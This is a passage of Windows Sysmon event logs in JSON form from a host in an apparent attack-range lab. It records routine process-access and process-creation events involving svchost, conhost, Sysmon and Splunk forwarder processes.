C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:50.906","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5676,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:50.906\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:50.906","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5677,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:50.906\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0332-5F25-0000-001061C20A00}\r\nTargetProcessId: 3068\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:50.906","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0332-5F25-0000-001061C20A00}","TargetProcessId":"3068","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5678,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:51.628\r\nProcessGuid: {A837DB8D-0333-5F25-0000-001037C40A00}\r\nProcessId: 4856\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nFileVersion: 8.0.2\r\nDescription: Active Directory monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-admon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:51.628","ProcessGuid":"{A837DB8D-0333-5F25-0000-001037C40A00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","FileVersion":"8.0.2","Description":"Active Directory monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-admon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:52:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5679,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:51.625\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-0333-5F25-0000-001037C40A00}\r\nTargetProcessId: 4856\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:51.625","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-0333-5F25-0000-001037C40A00}","TargetProcessId":"4856","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5680,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:51.625\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0333-5F25-0000-001037C40A00}\r\nTargetProcessId: 4856\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:51.625","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0333-5F25-0000-001037C40A00}","TargetProcessId":"4856","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5681,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:51.625\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:51.625","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5682,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:51.625\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:51.625","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5683,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:51.625\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:51.625","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
